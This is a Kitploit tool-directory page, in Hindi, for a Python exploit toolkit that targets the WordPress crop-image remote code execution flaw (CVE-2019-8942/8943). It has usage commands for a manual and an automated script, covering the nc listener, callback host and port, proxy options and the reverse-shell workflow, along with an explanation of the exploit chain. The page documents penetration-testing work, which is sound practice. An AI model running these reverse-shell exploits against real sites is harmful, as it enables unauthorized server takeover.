Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
WordPress-RCE-CVE-2019-8942 — वर्डप्रेस क्रॉप इमेज RCE के लिए Python शोषण टूलकिट — CVE-2019-8942 & CVE-2019-8943 | Kitploit
उपकरण/GitHubGitHub/speatx/wordpress-rce-cve-2019-8942
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगपेलोड डेवलपमेंटलैब और अभ्यास
GitHubspeatx/wordpress-rce-cve-2019-8942

WordPress-RCE-CVE-2019-8942

वर्डप्रेस क्रॉप इमेज RCE के लिए Python शोषण टूलकिट — CVE-2019-8942 & CVE-2019-8943

रिपॉजिटरी देखें
174 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

WordPress Crop Image RCE — CVE-2019-8942 / CVE-2019-8943

प्रमाणित WordPress क्रॉप-इमेज शोषण श्रृंखला का Python3 कार्यान्वयन। यह रिपॉजिटरी दो स्वतंत्र कार्यप्रवाहों के आसपास आयोजित की गई है: एक मैन्युअल OSCP-शैली स्क्रिप्ट और एक पूरी तरह से स्वचालित स्क्रिप्ट जिसमें एक एकीकृत रिवर्स-शेल हैंडलर है।

इसका उपयोग केवल अधिकृत लैब्स, CTFs, प्रशिक्षण प्लेटफार्मों या उन प्रणालियों में करें जहाँ आपके पास परीक्षण करने की स्पष्ट अनुमति है।


प्रभावित WordPress संस्करण

शोषण श्रृंखला निम्नलिखित भेद्यताओं को लक्षित करती है:

  • CVE-2019-8942
  • CVE-2019-8943

इस भेद्यता के लिए सार्वजनिक Metasploit मॉड्यूल प्रभावित संस्करणों का वर्णन इस प्रकार करता है:

WordPress 5.0.0 और WordPress <= 4.9.8

एक वैध WordPress खाता जिसमें मीडिया अपलोड/संपादन अनुमतियाँ हों, आवश्यक है। कई लैब वातावरणों में, लेखक-स्तर का उपयोगकर्ता पर्याप्त होता है।


रिपॉजिटरी लेआउट

.
├── autoexploit.py
├── exploit_oscp.py
├── image.jpg
├── README.md
└── requirements.txt

image.jpg डिफ़ॉल्ट JPG वाहक है जिसका उपयोग OSCP-शैली स्क्रिप्ट द्वारा किया जाता है। इसे शामिल किया गया है ताकि मैन्युअल कार्यप्रवाह बिना किसी यादृच्छिक छवि की खोज किए तुरंत काम करे।

autoexploit.py स्व-निहित है और इसमें आंतरिक रूप से अपना हेक्साडेसिमल JPG वाहक शामिल है, लेकिन यह -i के साथ एक कस्टम JPG भी स्वीकार कर सकता है।


स्थापना

python3 -m pip install -r requirements.txt

एकमात्र आवश्यक Python पैकेज है:

requests

यदि आप SOCKS प्रॉक्सी समर्थन चाहते हैं, तो अपने वातावरण में SOCKS एक्स्ट्रा के साथ requests स्थापित करें:

python3 -m pip install 'requests[socks]'

स्क्रिप्ट चयन

स्क्रिप्टसर्वश्रेष्ठ के लिएइमेज हैंडलिंगशेल हैंडलिंग
exploit_oscp.pyOSCP-शैली/मैन्युअल शोषणडिफ़ॉल्ट रूप से image.jpg का उपयोग करता है, या -i custom.jpgआप nc मैन्युअल रूप से शुरू करते हैं
autoexploit.pyतेज़ लैब उपयोग और पुनरावृत्त परीक्षणडिफ़ॉल्ट रूप से एक एम्बेडेड हेक्स JPG का उपयोग करता है, या -i custom.jpgलिसनर शुरू करता है, कॉलबैक ट्रिगर करता है, और एक इंटरैक्टिव कंसोल खोलता है

दोनों स्क्रिप्ट स्वतंत्र हैं। कोई भी दूसरे से कोड आयात नहीं करता है।


OSCP-शैली कार्यप्रवाह

exploit_oscp.py कार्यप्रवाह को स्पष्ट रखता है। यह इमेज वाहक तैयार करता है, प्रमाणित WordPress शोषण श्रृंखला करता है, कमांड निष्पादन की पुष्टि करता है, और आपके द्वारा मैन्युअल रूप से शुरू किए गए लिसनर पर एक रिवर्स शेल ट्रिगर करता है।

यह स्वचालित रूप से हैंडलर शुरू नहीं करता है और Metasploit, Meterpreter, या msfvenom का उपयोग नहीं करता है।

बुनियादी OSCP उपयोग

पहले अपना लिसनर शुरू करें:

nc -lvnp 443

डिफ़ॉल्ट image.jpg का उपयोग करके शोषण चलाएँ:

python3 exploit_oscp.py -t http://target.local/ -u username -p password --lhost 10.10.14.8 --lport 443

कस्टम JPG के साथ OSCP उपयोग

nc -lvnp 443
python3 exploit_oscp.py -t http://target.local/ -u username -p password -i ./custom.jpg --lhost 10.10.14.8 --lport 443

OSCP विकल्प

विकल्पआवश्यकडिफ़ॉल्टअर्थ
-t, --targetहाँकोई नहींलक्षित WordPress बेस URL, उदाहरण http://target.local/
-u, --usernameहाँकोई नहींWordPress उपयोगकर्ता नाम
-p, --passwordहाँकोई नहींWordPress पासवर्ड
-i, --imageनहींimage.jpgतैयार करने और अपलोड करने के लिए JPG वाहक
--lhostहाँकोई नहींआपका कॉलबैक IP, सामान्यतः आपका VPN/tun0 IP
--lportहाँकोई नहींवह पोर्ट जहाँ आपका मैन्युअल लिसनर प्रतीक्षा कर रहा है
--proxyनहींकोई नहींप्रॉक्सी URL, उदाहरण http://127.0.0.1:8080 या socks5://127.0.0.1:9050
--user-agentनहींअंतर्निर्मितकस्टम User-Agent हेडर
--random-user-agentनहींअक्षमयादृच्छिक ब्राउज़र-जैसा User-Agent उपयोग करें
--timeoutनहीं20HTTP समय-सीमा सेकंड में
--debugनहींअक्षमHTTP डीबग आउटपुट प्रिंट करें और उपयोगी विफल प्रतिक्रियाएँ सहेजें

Burp के साथ OSCP उदाहरण

python3 exploit_oscp.py -t http://target.local/ -u username -p password -i ./image.jpg --lhost 10.10.14.8 --lport 443 --proxy http://127.0.0.1:8080

पूरी तरह से स्वचालित कार्यप्रवाह

autoexploit.py गति के लिए डिज़ाइन किया गया है। यह केवल लक्ष्य क्रेडेंशियल्स के साथ चल सकता है और कॉलबैक IP और लिसनर पोर्ट को स्वचालित रूप से चुनने का प्रयास करेगा।

यह पूर्ण शोषण प्रवाह करता है, एक स्थानीय लिसनर शुरू करता है, कई रिवर्स-शेल पेलोड शैलियों का प्रयास करता है, और रंगीन स्थानीय स्थिति संदेशों और शांत TTY-अपग्रेड हैंडलिंग के साथ एक स्वच्छ इंटरैक्टिव कंसोल खोलता है।

बुनियादी स्वचालित उपयोग

python3 autoexploit.py -t http://target.local/ -u username -p password

स्पष्ट कॉलबैक मानों के साथ स्वचालित उपयोग

python3 autoexploit.py -t http://target.local/ -u username -p password --lhost 10.10.14.8 --lport 443

कस्टम इमेज और प्रॉक्सी के साथ स्वचालित उपयोग

python3 autoexploit.py -t http://target.local/ -u username -p password -i ./image.jpg --proxy http://127.0.0.1:8080

स्वचालित विकल्प

विकल्पआवश्यकडिफ़ॉल्टअर्थ
-t, --targetहाँकोई नहींलक्षित WordPress बेस URL
-u, --usernameहाँकोई नहींWordPress उपयोगकर्ता नाम
-p, --passwordहाँकोई नहींWordPress पासवर्ड
-i, --imageनहींएम्बेडेड हेक्स JPGवैकल्पिक कस्टम JPG वाहक
--lhostनहींस्वतः-पता लगाया गयारिवर्स शेल द्वारा उपयोग किया जाने वाला कॉलबैक IP
--lportनहींमुक्त स्थानीय पोर्टस्थानीय लिसनर पोर्ट
--listen-timeoutनहीं12प्रत्येक रिवर्स-शेल प्रयास के लिए प्रतीक्षा करने के लिए सेकंड
--proxyनहींकोई नहींप्रॉक्सी URL, उदाहरण http://127.0.0.1:8080 या socks5://127.0.0.1:9050
--user-agentनहींअंतर्निर्मितकस्टम User-Agent हेडर
--random-user-agentनहींअक्षमयादृच्छिक ब्राउज़र-जैसा User-Agent उपयोग करें
--timeoutनहीं20HTTP समय-सीमा सेकंड में
--debugनहींअक्षमHTTP डीबग आउटपुट प्रिंट करें और उपयोगी विफल प्रतिक्रियाएँ सहेजें

प्रॉक्सी और User-Agent उदाहरण

Burp के माध्यम से HTTP प्रॉक्सी:

python3 autoexploit.py -t http://target.local/ -u username -p password --proxy http://127.0.0.1:8080

SOCKS प्रॉक्सी:

python3 autoexploit.py -t http://target.local/ -u username -p password --proxy socks5://127.0.0.1:9050

कस्टम User-Agent:

python3 exploit_oscp.py -t http://target.local/ -u username -p password --lhost 10.10.14.8 --lport 443 --user-agent "Mozilla/5.0 Custom"

यादृच्छिक User-Agent:

python3 autoexploit.py -t http://target.local/ -u username -p password --random-user-agent

इमेज क्यों मायने रखती है

यह सामान्य PHP अपलोड नहीं है। WordPress छवि सामग्री की अपेक्षा करता है, फ़ाइल को मीडिया संपादक के माध्यम से संसाधित करता है, और एक क्रॉप की गई छवि बनाता है। शोषण श्रृंखला फिर अनुलग्नक मेटाडेटा और पथ ट्रैवर्सल का दुरुपयोग करके सक्रिय थीम निर्देशिका के अंदर एक क्रॉप की गई छवि रखती है। अंत में, क्रॉप की गई फ़ाइल को एक पृष्ठ टेम्पलेट के रूप में संदर्भित किया जाता है ताकि WordPress इसे PHP के रूप में शामिल करे।

नाजुक EXIF मेटाडेटा में PHP के साथ एक यादृच्छिक JPG विफल हो सकता है क्योंकि GD क्रॉप प्रसंस्करण के दौरान मेटाडेटा को हटा या पुनः-एन्कोड कर सकता है। यह रिपॉजिटरी कार्यप्रवाह को स्पष्ट रखती है:

  • exploit_oscp.py डिफ़ॉल्ट रूप से शामिल image.jpg या -i के साथ पारित कस्टम छवि का उपयोग करता है।
  • autoexploit.py में एक आंतरिक हेक्साडेसिमल वाहक होता है ताकि यह स्व-निहित रहे।
  • दोनों कार्यप्रवाह अपलोड को इस तरह तैयार करते हैं कि यह WordPress क्रॉप चरण से बचने का इरादा रखता है।

तकनीकी प्रवाह

टूल डाउनलोड करें